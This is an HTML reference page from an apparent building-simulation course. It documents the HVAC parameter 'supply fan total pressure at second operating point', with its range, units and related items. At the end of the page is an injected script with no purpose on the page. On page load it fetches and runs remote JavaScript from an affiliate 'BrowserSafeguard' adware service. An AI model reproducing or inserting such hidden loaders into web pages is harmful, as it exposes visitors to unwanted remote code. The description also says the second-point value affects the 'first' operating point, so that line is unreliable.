﻿<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Learn High Performance Buildings</title>
<meta name="description" content="Info about LHPB.">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, zoom=20%, target-densitydpi=high-dpi">
<link href="../css/normalize.css" rel="stylesheet" type="text/css">
<link href="../css/info.css" rel="stylesheet" type="text/css">
<link rel="shortcut icon" href="file:../images/favicon.ico" >
</head>
<body>
<div id="wrapper" class="cf">
<div id="container">
<div id="from">
</div>
<div id="logo" title="LHPB: Learn High Performance Buildings"></div>
<div id="title" class="cf">Learn High Performance Buildings</div>
<div id="info" class="cf">
<h1>SUPPLY FAN TOTAL PRESSURE AT SECOND OPERATING POINT</h1>
<h3>Associated System: Fan</h3>
<div class="graphic"> <img src="../HVAC AHU & Ducts/HVACFan.png" alt=""/ ></div>    
<p>this parameter is a single point in supply fan system's curve which defines the system pressure at some given index, typically the hvac system's total airflow. As the ambient conditions outside of a building rise in temperature, a building's HVAC system will require more cooling or heating in the form of conditioned air delivered to the building's terminal boxes.</p>      
<!--<p>(<a href="#">See also the �</a> )</p>-->
<p>An increase in the value will increase the HVAC system's pressure at the first operating point</p>      
<h4>The value of this variable can not be adjusted during simulation run-time. It may be adjusted before or after a simulation.</h4>      
<h2>Variable Descriptions</h2>
<ul class="list-variable">        
<li><label>Default:</label> 0</li>
<li><label>Minimum:</label> 0</li>
<li><label>Maximum:</label> 1000</li>
<!--<li><label>Default Units:</label> i_Default</li>-->
<!-- <li><label>English:</label> </li>-->
<li><label>IP Unit:</label> In.W</li>
<li><label>SI Units:</label> Pa</li>      </ul>
<h2>Related Items: </h2>
<ul><li>SUPPLY FAN VOLUME FLOW RATE AT FIRST OPERATING POINT</li><li>SUPPLY FAN TOTAL PRESSURE AT FIRST OPERATING POINT</li><li>SUPPLY FAN VOLUME FLOW RATE AT SECOND OPERATING POINT</li><li>SUPPLY FAN TOTAL PRESSURE AT SECOND OPERATING POINT</li><li>RETURN FAN VOLUME FLOW RATE AT FIRST OPERATING POINT</li></ul>
<h2>Links:</h2>
<ul>
<li><a href="http://www.greenheck.com/library/articles/10" target="_blank">http://www.greenheck.com/library/articles/10</a></li><li><a href="http://www.su-per-b.org" target="_blank">http://www.su-per-b.org</a></li>      </ul>
<div class="version"> Version 1.00</div>
    </div>
  </div>
</div>
<script type="text/javascript">(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://learnhpb.org/demos/13.01/i-content/iv-SYSTAirDB.html') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-rt-tightrope&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();</script></body>
</html>
